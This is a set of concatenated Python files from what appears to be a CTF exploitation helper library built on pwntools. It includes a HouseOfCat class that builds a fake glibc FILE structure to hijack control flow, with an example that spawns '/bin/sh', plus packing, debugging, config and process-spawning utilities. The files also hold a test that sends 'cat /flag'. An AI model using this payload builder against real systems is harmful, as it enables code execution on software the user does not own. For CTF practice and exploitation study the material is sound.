from typing import Any

from ...typing import p64
from ...context import libc
from .struct import IO_FILE_plus


class HouseOfCat:
    """
    FSOP 版本的 house_of_cat，在 2.35 下测试通过，返回一个 fake_IO payload
        rdi: 仅能设置 rdi 指针所指向的内容
        rdx: rdx 寄存器内容
        fake_io_addr: fake_IO 的地址
        call_addr: 调用的地址

        e.g.
            cat = house_of_cat()
            cat.fake_io_addr = heap
            cat.rdi = b"/bin/sh\x00"
            cat.rdx = p64(0xcafec0de)
            cat.call_addr = p64(backd00r)
            cat.vtable = p64(libc.sym['_IO_wfile_jumps'] + 0x30)

            send(bytes(cat))
    """

    MAPPING = {
        "rdi": "_flags",
        "rdx": "_IO_backup_base",
        "fake_io_addr": "_wide_data",
        "call_addr": "_IO_save_end",
        # "writable": "_lock",
        "vtable": "vtable",
    }
    rdi: int = 0
    rdx: int = 0
    fake_io_addr: int = 0
    call_addr: int = 0
    # writable: int = 0  # seems no need
    vtable: int = 0

    def __init__(self):
        print("house", id(libc))
        self.file = IO_FILE_plus()
        self.file._mode = 1  # mode <= 0 (_IO_flush_all_lockp)
        self.file._IO_save_base = 1  # mode == 0 (_IO_wfile_seekoff)
        self.file._IO_write_ptr = 1  # was_writing (_IO_wfile_seekoff)
        setattr(self, "vtable", libc.sym["_IO_wfile_jumps"] + 0x30)

    def __setattr__(self, __name: str, __value: Any) -> None:
        if __name in self.MAPPING:
            if __name == "fake_io_addr":
                self.file._wide_data = __value + 0x30  # rax1
            else:
                setattr(self.file, self.MAPPING[__name], __value)
        else:
            super().__setattr__(__name, __value)

    def __getattr__(self, __name: str) -> Any:
        if __name in self.MAPPING:
            if __name == "fake_io_addr":
                return self.file._IO_backup_base - 0xB0
            return getattr(self.file, self.MAPPING[__name])
        else:
            return super().__getattr__(__name)

    def __bytes__(self) -> bytes:
        return bytes(self.file).ljust(0x110, b"\x00") + p64(
            self.file._wide_data + 0x10
        )  # rax2

    def __call__(self, **kwds: Any) -> Any:
        for k, v in kwds.items():
            setattr(self, k, v)
        return self



from pydantic import BaseModel
from pwn import flat

from ...context import context


class IO_FILE(BaseModel):
    _flags: int = 0
    _IO_read_ptr: int = 0
    _IO_read_end: int = 0
    _IO_read_base: int = 0
    _IO_write_base: int = 0
    _IO_write_ptr: int = 0
    _IO_write_end: int = 0
    _IO_buf_base: int = 0
    _IO_buf_end: int = 0
    _IO_save_base: int = 0
    _IO_backup_base: int = 0
    _IO_save_end: int = 0
    _markers: int = 0
    _chain: int = 0
    _fileno: int = 0
    _flags2: int = 0
    _old_offset: int = 0
    _cur_column: int = 0
    _vtable_offset: int = 0
    _shortbuf: int = 0
    _lock: int = 0
    _offset: int = 0
    _codecvt: int = 0
    _wide_data: int = 0
    _freeres_list: int = 0
    _freeres_buf: int = 0
    _pad5: int = 0
    _mode: int = 0
    _unused2: bytes = b""

    def __bytes__(self) -> bytes:
        if context.arch != "amd64":
            raise Exception(f"{self.__class__.__name__} is only supported on amd64")
        return flat(
            {
                0: [
                    self._flags,
                    self._IO_read_ptr,
                    self._IO_read_end,
                    self._IO_read_base,
                    self._IO_write_base,
                    self._IO_write_ptr,
                    self._IO_write_end,
                    self._IO_buf_base,
                    self._IO_buf_end,
                    self._IO_save_base,
                    self._IO_backup_base,
                    self._IO_save_end,
                    self._markers,
                    self._chain,
                    self._fileno.to_bytes(4, "little")
                    + self._flags2.to_bytes(4, "little"),
                    self._old_offset,
                    (
                        self._cur_column.to_bytes(2, "little")
                        + self._vtable_offset.to_bytes(1, "little")
                        + self._shortbuf.to_bytes(1, "little")
                    ).ljust(8, b"\x00"),
                    self._lock,
                    self._offset,
                    self._codecvt,
                    self._wide_data,
                    self._freeres_list,
                    self._freeres_buf,
                    self._pad5,
                    self._mode.to_bytes(4, "little"),
                ],
                0xC4: self._unused2.ljust(20, b"\x00"),
            }
        )


class IO_FILE_plus(IO_FILE):
    vtable: int = 0

    def __bytes__(self) -> bytes:
        return flat(super().__bytes__().ljust(0xD8, b"\x00"), self.vtable)



from typing import Literal, Any
from pwn import pwnlib


def p64(
    number: int,
    endianness: Literal["little", "big"] = None,
    sign: bool = None,
    **kwargs: Any,
):
    """
    Packs integer into wordsize of 64.

    endianness and signedness is done according to context.

    Arguments:
        number (int): Number to convert
        endianness (str): Endianness of the converted integer ("little"/"big")
        sign (bool): Signedness of the converted integer (False/True)
        kwargs: Anything that can be passed to context.local

    Returns:
        The packed number as a byte.
    """
    return pwnlib.util.packing.p64(number, endianness=endianness, sign=sign, **kwargs)


def p32(
    number: int,
    endianness: Literal["little", "big"] = None,
    sign: bool = None,
    **kwargs: Any,
):
    """
    Packs integer into wordsize of 32.

    endianness and signedness is done according to context.

    Arguments:
        number (int): Number to convert
        endianness (str): Endianness of the converted integer ("little"/"big")
        sign (bool): Signedness of the converted integer (False/True)
        kwargs: Anything that can be passed to context.local

    Returns:
        The packed number as a byte.
    """
    return pwnlib.util.packing.p32(number, endianness=endianness, sign=sign, **kwargs)


def p16(
    number: int,
    endianness: Literal["little", "big"] = None,
    sign: bool = None,
    **kwargs: Any,
):
    """
    Packs integer into wordsize of 16.

    endianness and signedness is done according to context.

    Arguments:
        number (int): Number to convert
        endianness (str): Endianness of the converted integer ("little"/"big")
        sign (bool): Signedness of the converted integer (False/True)
        kwargs: Anything that can be passed to context.local

    Returns:
        The packed number as a byte.
    """
    return pwnlib.util.packing.p16(number, endianness=endianness, sign=sign, **kwargs)


def p8(
    number: int,
    endianness: Literal["little", "big"] = None,
    sign: bool = None,
    **kwargs: Any,
):
    """
    Packs integer into wordsize of 8.

    endianness and signedness is done according to context.

    Arguments:
        number (int): Number to convert
        endianness (str): Endianness of the converted integer ("little"/"big")
        sign (bool): Signedness of the converted integer (False/True)
        kwargs: Anything that can be passed to context.local

    Returns:
        The packed number as a byte.
    """
    return pwnlib.util.packing.p8(number, endianness=endianness, sign=sign, **kwargs)


def u64(
    data: bytes,
    endianness: Literal["little", "big"] = None,
    sign: bool = None,
    **kwargs: Any,
):
    """
    Unpacks 64-bit integer from data.

    endianness and signedness is done according to context.

    Arguments:
        data (bytes): Data to unpack from
        endianness (str): Endianness of the integer ("little"/"big")
        sign (bool): Signedness of the integer (False/True)
        kwargs: Anything that can be passed to context.local

    Returns:
        The unpacked integer.
    """
    return pwnlib.util.packing.u64(data, endianness=endianness, sign=sign, **kwargs)


def u32(
    data: bytes,
    endianness: Literal["little", "big"] = None,
    sign: bool = None,
    **kwargs: Any,
):
    """
    Unpacks 32-bit integer from data.

    endianness and signedness is done according to context.

    Arguments:
        data (bytes): Data to unpack from
        endianness (str): Endianness of the integer ("little"/"big")
        sign (bool): Signedness of the integer (False/True)
        kwargs: Anything that can be passed to context.local

    Returns:
        The unpacked integer.
    """
    return pwnlib.util.packing.u32(data, endianness=endianness, sign=sign, **kwargs)


def u16(
    data: bytes,
    endianness: Literal["little", "big"] = None,
    sign: bool = None,
    **kwargs: Any,
):
    """
    Unpacks 16-bit integer from data.

    endianness and signedness is done according to context.

    Arguments:
        data (bytes): Data to unpack from
        endianness (str): Endianness of the integer ("little"/"big")
        sign (bool): Signedness of the integer (False/True)
        kwargs: Anything that can be passed to context.local

    Returns:
        The unpacked integer.
    """
    return pwnlib.util.packing.u16(data, endianness=endianness, sign=sign, **kwargs)


def u8(
    data: bytes,
    endianness: Literal["little", "big"] = None,
    sign: bool = None,
    **kwargs: Any,
):
    """
    Unpacks 8-bit integer from data.

    endianness and signedness is done according to context.

    Arguments:
        data (bytes): Data to unpack from
        endianness (str): Endianness of the integer ("little"/"big")
        sign (bool): Signedness of the integer (False/True)
        kwargs: Anything that can be passed to context.local

    Returns:
        The unpacked integer.
    """
    return pwnlib.util.packing.u8(data, endianness=endianness, sign=sign, **kwargs)



from typing import Callable, Literal, Any
from sorcery import spell, args_with_source
from sorcery.core import FrameInfo
from functools import partial
from pwn import remote, process, gdb, pause, pwnlib, hexdump
from pwn import (
    success as _success,
    info as _info,
    debug as _debug,
    warning as _warning,
    warn as _warn,
    error as _error,
)
from ..context import config, get_instance

DBG_CNT = -1


def uu64(
    data: bytes,
    endianness: Literal["little", "big"] = None,
    sign: bool = None,
    **kwargs: Any,
):
    """
    Unpacks 64-bit integer from padded data.

    endianness and signedness is done according to context.

    Arguments:
        data (bytes): Data to unpack from
        endianness (str): Endianness of the integer ("little"/"big")
        sign (bool): Signedness of the integer (False/True)
        kwargs: Anything that can be passed to context.local

    Returns:
        The unpacked integer.
    """
    return pwnlib.util.packing.u64(
        data.ljust(8, b"\x00"), endianness=endianness, sign=sign, **kwargs
    )


def uu32(
    data: bytes,
    endianness: Literal["little", "big"] = None,
    sign: bool = None,
    **kwargs: Any,
):
    """
    Unpacks 32-bit integer from padded data.

    endianness and signedness is done according to context.

    Arguments:
        data (bytes): Data to unpack from
        endianness (str): Endianness of the integer ("little"/"big")
        sign (bool): Signedness of the integer (False/True)
        kwargs: Anything that can be passed to context.local

    Returns:
        The unpacked integer.
    """
    return pwnlib.util.packing.u32(
        data.ljust(4, b"\x00"), endianness=endianness, sign=sign, **kwargs
    )


def dbg(
    gdb_script: str = None,
    sh: process | remote | None = None,
    s: int = 4,
    force: bool = False,
):
    """
    附加 GDB，默认选择最新的 process
    参数：
        gdb_script(str)
            GDB 调试参数，用 \n 分割
        sh(process | remote)
            指定附加的 sh
        s(int)
            等待时间，在 attach 上进程后等待多少秒，默认为 4s
        force(bool)
            强制调试 gdb.debug() 的实例或是 remote 实例
    """
    if (config.REMOTE or config.GDB or config.NO_DEBUG) and not force:
        return
    if sh is None:
        _, sh = get_instance()
        if isinstance(sh, remote) and not force:
            return

    global DBG_CNT
    DBG_CNT += 1
    if config.DBG and DBG_CNT not in config.DBG:
        return
    gdb.attach(sh, gdb_script)
    if not config.GDB:
        if s == -1:
            return
        if s == 0:
            pause()
        else:
            pause(s)


def __pplog(
    frame_info: FrameInfo,
    func: Callable[[Any], None],
    msg: Any,
    *args: Any,
    **kwargs: Any,
):
    for source, arg in args_with_source.at(frame_info)(msg, *args, kwargs):
        if isinstance(arg, int):
            func(f"{source}: {arg:#x}({arg})")
        elif isinstance(arg, bytes):
            func(f"{source}\n{hexdump(arg)}")
        else:
            func(f"{source}: {arg}")


success: Callable[[Any], None] = partial(spell(__pplog), _success)
info: Callable[[Any], None] = partial(spell(__pplog), _info)
debug: Callable[[Any], None] = partial(spell(__pplog), _debug)
warning: Callable[[Any], None] = partial(spell(__pplog), _warning)
warn: Callable[[Any], None] = partial(spell(__pplog), _warn)
error: Callable[[Any], None] = partial(spell(__pplog), _error)



from pwn import *
from src.pwno import *

context.log_level = "debug"
config.ATTACHMENT = "./pwn"


def testFrame():
    # test if get_instance() returns the same instance while in different stack frame
    print(">>> TESTING FRAME")
    testFrameSH: process = gen_sh()

    def send_here():
        _, my_sh = get_instance()
        assert my_sh == testFrameSH
        sl(b"0")

    send_here()
    testFrameSH.close()
    print(">>> FRAME TEST PASSED")


def testAbbr():
    # test if abbr works
    print(">>> TESTING ABBR")
    sh: process = gen_sh()
    my_sh_name, my_sh = get_instance()
    sl(b"0")
    assert my_sh == sh, f"sh is {sh} with PID {sh.proc.pid} but get_instance() returns "
    f"{(my_sh_name, my_sh)} with PID {my_sh.proc.pid})"
    sh.close()
    print(">>> ABBR TEST PASSED")


def testAbbrAfterClose():
    print(">>> TESTING ABBR AFTER CLOSE")
    sh: process = gen_sh()
    old = sh
    sl(b"0")
    sh.close()

    sh: process = gen_sh()

    new = get_instance()
    assert old != new, "get_instance() is still using the old instance"
    sl(b"0")
    sh.close()
    another_name: process = gen_sh()
    new_ = get_instance()
    assert (
        new != new_
    ), "get_instance() is still using the old instance without changing it's name"
    sl(b"0")
    another_name.close()
    print(">>> ABBR AFTER CLOSE TEST PASSED")


def testCustomAbbr():
    # test if custom abbr works
    print(">>> TESTING CUSTOM ABBR")
    p = gen_sh()
    sh = gen_sh()

    my_sl = abbr(p.sendline)
    p_instance = get_instance("p")
    sh_instance = get_instance()

    assert p_instance != sh_instance, "get_instance() doesn't return two instances"
    my_sl(b"0")
    my_sl(b"1")
    sl(b"1")
    p.close()
    p = gen_sh()
    my_sl(b"2")
    assert p_instance != get_instance(
        "p"
    ), "get_instance(name) doesn't return two different instances."
    p.close()
    sh.close()
    print(">>> CUSTOM ABBR TEST PASSED")


def testAbbrRemote():
    sh = remote("localhost", 19919)
    sl(b"echo 1 > /dev/null")
    p = remote("localhost", 19919)
    sl(b"cat /flag")
    ia()


testFrame()
testAbbr()
testAbbrAfterClose()
testCustomAbbr()

testAbbrRemote()



import subprocess
from pathlib import Path
from typing_extensions import Annotated
from pwn import *
from elftools.common.exceptions import ELFError
from argparse import ArgumentParser
from pydantic import (
    BaseModel,
    model_validator,
    Field,
    field_validator,
    ValidationError,
    ValidationInfo,
)


# ------- Default Settings -------
class Config(BaseModel, extra="ignore"):
    ATTACHMENT: Annotated[str, Field(validate_default=True)] = None
    RUNARGS: str = ""
    LIBC: Annotated[str, Field(validate_default=True)] = None
    HOST: str = ""
    PORT: int = 0

    NO_DEBUG: bool = False
    REMOTE: bool = False
    GDB: bool = False  # gdb.debug(elf.path, gdbscript=gdbscript)
    GDB_SCRIPT: Annotated[str, Field(validate_default=True)] = None
    DBG: Annotated[list[int], Field(validate_default=True)] = None

    @field_validator("ATTACHMENT", mode="before")
    def _attachment(cls, value) -> str:
        if value is None:

            def is_elf(path: Path):
                try:
                    result = subprocess.run(
                        ["file", str(path)], capture_output=True, text=True
                    )
                    return "ELF" in result.stdout and "executable" in result.stdout
                except Exception:
                    return False

            for file in Path.cwd().iterdir():
                if file.is_file() and is_elf(file):
                    info('No Attachment set, using "%s"...', file.absolute())
                    return str(file.absolute())
            info('No Attachment set, using "/bin/sh"...')
            return "/bin/sh"  # fallback
        return value

    @field_validator("DBG", mode="before")
    def _dbg(cls, value) -> list[int]:
        if value is None:
            return []
        return [int(i) for i in value.split(",")]

    @field_validator("GDB_SCRIPT", mode="before")
    def _gdb_script(cls, value) -> str:
        if value is None:
            return ""
        if Path(value).is_file():
            return Path(value).read_text()
        return value.replace("\\n", "\n")

    @field_validator("LIBC", mode="before")
    def _libc(cls, value: str | None, info_: ValidationInfo) -> str:
        print(info_)
        if value is None:
            libc_base = subprocess.run(
                ["ldd", info_.data.get("ATTACHMENT", "/bin/sh")],
                capture_output=True,
                text=True,
            ).stdout
            libc_path = libc_base.split("libc.so.6 => ")[1].split("(")[0].strip()
            info('No Libc set, using "%s"...', libc_path)
            return libc_path
        return value

    @model_validator(mode="before")
    def ignore_None(cls, values):
        fin = {k: v for k, v in values.items() if v is not None}
        keys = list(fin.keys())
        if ("HOST" in keys and "PORT" not in keys) or (
            "PORT" in keys and "HOST" not in keys
        ):
            raise ValidationError("Host and Port should be both set.")

        if "REMOTE" in fin.keys():
            rmt = values["REMOTE"].split(":")
            fin["HOST"] = rmt[0]
            fin["PORT"] = int(rmt[1])
            fin["REMOTE"] = True
        return fin


parser = ArgumentParser(description="Pwnable Commandline")
parser.add_argument("ATTACHMENT", nargs="?")
parser.add_argument("--libc", "-l", nargs="?", dest="LIBC")
parser.add_argument(
    "--debug",
    "-d",
    action="store",
    dest="DBG",
    help=(
        "Which dbg() to be executed, default is `all`"
        "use comma to split. e.g. `-d 0,1,3`"
    ),
)
parser.add_argument(
    "--no-debug", "-D", action="store_true", dest="NO_DEBUG", help="Disable debug mode"
)
parser.add_argument(
    "--remote", "-r", action="store", dest="REMOTE", help="Remote host:port"
)
parser.add_argument(
    "--host",
    "-H",
    action="store",
    dest="HOST",
    help="Remote host, if remote is set, this option will be ignored",
)
parser.add_argument(
    "--port",
    "-p",
    action="store",
    dest="PORT",
    help="Remote port, if remote is set, this option will be ignored",
)
parser.add_argument(
    "--gdb", "-g", action="store_true", dest="GDB", help="Run binary using gdb.debug"
)
parser.add_argument(
    "--gdb-script", "-G", action="store", dest="GDB_SCRIPT", help="GDB script to run"
)
parser.add_argument(
    "--args", "-a", action="store", dest="RUNARGS", help="Arguments to run binary"
)
args = parser.parse_args()

config = Config(**vars(args))
try:
    Elf = ELF(config.ATTACHMENT)
    context.arch = Elf.arch
except ELFError:
    Elf = None
    log.warning(f"{config.ATTACHMENT} is not a valid ELF file!, `Elf` is not set")
try:
    libc = ELF(config.LIBC)
except ELFError:
    libc = None
    log.warning(f"{config.LIBC} is not a valid ELF file!, `libc` is not set")

context.log_level = "debug"
context.os = "linux"



import os

from pwn import *

from .context import config
from ..helper.utils import DBG_CNT


def gen_sh(*a, f_or_h: str | Path = None, port: int = None, **kw) -> process | remote:
    """
    生成一个 process 或 remote 实例
    如果 config.REMOTE 为 True 则生成 remote 实例，否则生成 process 实例。

    如果传入的参数只有一个，则会将其作为 config.ATTACHMENT，如果检测到
    如果传入的参数有两个，则会将第一个参数作为 config.HOST，第二个参数作为 config.PORT。

    """
    if len(a) == 1 or (f_or_h is not None and port is None):
        s = f_or_h or a[0]
        if ":" in s and len(r := s.split(":")) == 2 and r[1].isdigit():
            config.HOST = r[0]
            config.PORT = int([1])
            config.REMOTE = True
        else:
            config.ATTACHMENT = s if isinstance(s, str) else str(s)

        if len(a) >= 1:
            a = a[1:]

    elif len(a) == 2 or (f_or_h is not None and port is not None):
        s = f_or_h or a[0]
        p = port or a[1]
        config.HOST = s
        config.PORT = p
        config.REMOTE = True

        if len(a) >= 2:
            a = a[2:]

    if config.REMOTE:
        return remote(config.HOST, config.PORT)
    if not config.ATTACHMENT.startswith(".") and not config.ATTACHMENT.startswith("/"):
        config.ATTACHMENT = "./" + config.ATTACHMENT
    if config.GDB:
        gdb_script = config.GDB_SCRIPT or get_dbg_args()
        return gdb.debug(
            [config.ATTACHMENT, *config.RUNARGS.split(" ")],
            gdbscript=gdb_script,
        )

    return process([config.ATTACHMENT, *config.RUNARGS.split(" ")], *a, **kw)


def get_dbg_args() -> str:
    import inspect

    frame = inspect.currentframe()
    while frame and frame.f_locals.get("__name__", None) != "__main__":
        frame = frame.f_back

    if not frame:
        return ""

    filename = frame.f_code.co_filename
    with open(filename) as f:
        src = f.read()

    import ast

    tree = ast.parse(src)

    class FindDbg(ast.NodeVisitor):
        def __init__(self):
            self.dbg = []

        def visit_Call(self, node):
            if isinstance(node.func, ast.Name) and node.func.id == "dbg":
                global DBG_CNT
                if node.args:
                    DBG_CNT += 1
                    if config.DBG and DBG_CNT in config.DBG:
                        self.dbg.append(node.args[0].s)
                if node.keywords:
                    for kw in node.keywords:
                        if kw.arg == "gdb_script":
                            DBG_CNT += 1
                            if config.DBG and DBG_CNT in config.DBG:
                                self.dbg.append(kw.value.s)
            self.generic_visit(node)

    find_dbg = FindDbg()
    find_dbg.visit(tree)

    return "\n".join(find_dbg.dbg)


def initialization():
    # if we're using wsl, set context terminal to cmd.exe
    if "WSL_DISTRO_NAME" in os.environ:
        args = ["cmd.exe", "/c", "start"]
        if "WT_SESSION" in os.environ:
            args.extend(["wt.exe", "-w", "0"])

            if distro_name := os.getenv("WSL_DISTRO_NAME"):
                args.extend(["wsl.exe", "-d", distro_name, "bash", "-c"])
            else:
                args.extend(["bash.exe", "-c"])

        context.terminal = args


initialization()
